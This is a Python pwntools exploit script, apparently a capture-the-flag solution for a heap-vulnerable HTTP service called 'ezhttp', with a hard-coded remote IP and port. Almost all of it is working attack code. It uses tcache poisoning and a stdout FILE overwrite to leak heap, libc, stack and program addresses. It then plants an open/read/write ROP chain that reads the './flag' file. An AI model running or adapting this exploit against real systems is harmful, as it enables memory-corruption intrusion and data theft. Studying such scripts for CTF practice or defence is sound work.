from
PwnContext
import
*
# IPython is an optional convenience (interactive shell); the script still
# runs without it, only the `ipy` name is left unbound in that case.
try:
    from IPython import embed as ipy
except ImportError:
    print('IPython not installed.')
if __name__ == '__main__':
    # ---- PwnContext / pwntools session settings ---------------------------
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'

    # Thin wrappers over the PwnContext session object `ctx`.  Everything that
    # is sent is first coerced with str(), exactly like the original helpers.
    def s(data):
        return ctx.send(str(data))

    def sa(delim, data):
        return ctx.sendafter(str(delim), str(data))

    def sl(data):
        return ctx.sendline(str(data))

    def sla(delim, data):
        return ctx.sendlineafter(str(delim), str(data))

    def r(numb=4096):
        return ctx.recv(numb)

    def ru(delims, drop=True):
        return ctx.recvuntil(delims, drop)

    def irt():
        return ctx.interactive()

    def rs(*args, **kwargs):
        return ctx.start(*args, **kwargs)

    def dbg(gs='', **kwargs):
        return ctx.debug(gdbscript=gs, **kwargs)

    def uu32(data):
        # Zero-pad a short read up to a full 4-byte word before unpacking.
        return u32(data.ljust(4, '\0'))

    def uu64(data):
        # Zero-pad a short read up to a full 8-byte word before unpacking.
        return u64(data.ljust(8, '\0'))

    # Target binary, libc build and the hard-coded remote endpoint, plus the
    # symbols/breakpoints handed to the debugger.
    ctx.binary = './ezhttp.bak'
    ctx.remote_libc = './libc-2.27.so'
    ctx.remote = ('183.129.189.61', 56002)
    ctx.debug_remote_libc = True
    ctx.symbols = {'node': 0x203120}
    ctx.breakpoints = [0x18CD, 0x1753]
    ctx.debug()

    def lg(s, addr):
        """Print *s* right-aligned to 20 columns and *addr* in hex, in bold red."""
        print('\033[1;31;40m%20s-->0x%x\033[0m' % (s, addr))

    def _request(path, token, body):
        """Send one request to the service once it has printed 'me'.

        The request line is a fixed 'POST <path>' followed by a client-chosen
        'Cookie: user=admin' header and a 'token:' value, a blank line, and
        *body*.  Header and body are separated by a single '\\r\\n\\r\\n'.
        """
        header = 'POST ' + path + ' Cookie: user=admin token: ' + token
        sa('me', header + '\r\n\r\n' + body)

    def add(idx, content):
        """Create an entry holding *content*.

        `idx` is accepted for symmetry with delete()/edit() but is not part of
        the request body.
        """
        _request('/create', '\x01\x0d', 'content=' + content)

    def delete(idx):
        """Delete the entry at *idx*."""
        _request('/del', '\x01\x0d', 'index=' + str(idx))

    def edit(idx, content):
        """Overwrite the entry at *idx* with *content*.

        NOTE: this endpoint sends the token as '1\\r', unlike add()/delete()
        which send '\\x01\\r'; whether that difference is intentional cannot be
        determined from this script.
        """
        _request('/edit', '1\r', 'index=' + str(idx) + '&content=' + content)

    def _leak_qword():
        """Skip to the next '========' line and unpack the 8 bytes after it."""
        ru('========\n')
        return uu64(r(8))

    def _ptr_pair(base):
        """p64(base) followed by the first 6 bytes of p64(base + 8) and a newline."""
        return p64(base) + p64(base + 8)[:6] + '\n'

    # The session is retried from scratch on EOF and stopped on Ctrl-C.  Any
    # other error (e.g. int() failing on an unexpected leak line) propagates.
    while True:
        try:
            rs()
            context.log_level = 'info'

            add(0, 'a' * 0x10)
            ru('Your gift: ')
            heap_base = int(ru('"', drop=True), 16) - 0x260
            lg('heap_base', heap_base)

            delete(0)
            delete(0)
            marker = '\x05' * 0x8 + '\xff' * 6 + '\x05' * 2
            add(1, p64(heap_base + 0x10))
            add(2, 'a' * 0x8)
            add(3, marker)
            add(4, 'a' * 0xa0)
            add(5, 'a' * 0xf0)
            delete(4)
            add(6, '\x60\xb7')
            delete(1)

            edit(2, p64(heap_base + 0x280)[:6] + '\n')
            add(7, 'a' * 0x6)
            add(8, '\x80\xb7')
            add(9, p64(0xfbad3887))
            delete(7)
            edit(2, p64(heap_base + 0x280)[:6] + '\n')
            add(10, 'a' * 6)
            add(11, '\x80\xb7')
            add(12, 'a' * 0x10)
            edit(12, '\x80\n')

            # Three consecutive 8-byte reads, each preceded by a separator line.
            libc_base = _leak_qword() - 0x3ec780
            lg('libc', libc_base)
            aim = libc_base + 0x619f60  # overwritten below, kept as in the original
            environ = libc_base + 0x3ee098
            lg('environ', environ)

            edit(12, _ptr_pair(environ))
            stack = _leak_qword()
            aim = stack - 0x1940
            lg('stack', stack)

            edit(12, _ptr_pair(aim))
            prog = _leak_qword() - 0x1afc
            lg('prog', prog)
            node = prog + 0x203120

            delete(5)
            delete(5)
            add(13, 'a' * 0xf0)
            edit(13, p64(node) + p64(0) + '\n')
            add(14, 'a' * 0xf0)
            edit(2, './flag\0\n')
            add(15, 'a' * 0xf0)
            edit(15, p64(aim) + p64(0xf0) + p64(heap_base + 0x260) + p64(0x10) + '\n')

            # libc-relative offsets; all values below are as in the original script.
            pop_rdi = libc_base + 0x2155f
            pop_rsi = libc_base + 0x23e8a
            pop_rdx = libc_base + 0x1b96
            libc_open = libc_base + 0x10fd50
            libc_read = libc_base + 0x110180
            libc_write = libc_base + 0x110250
            flag_addr = heap_base + 0x260
            heap_addr = heap_base + 0x1000
            chain = [
                pop_rdi, flag_addr, pop_rsi, 0, libc_open,
                pop_rdi, 4, pop_rsi, heap_addr, pop_rdx, 0x30, libc_read,
                pop_rdi, 1, pop_rsi, heap_addr, pop_rdx, 0x30, libc_write,
                0,
            ]
            edit(0, ''.join(p64(q) for q in chain) + '\n')
            irt()
        except KeyboardInterrupt:
            break
        except EOFError:
            continue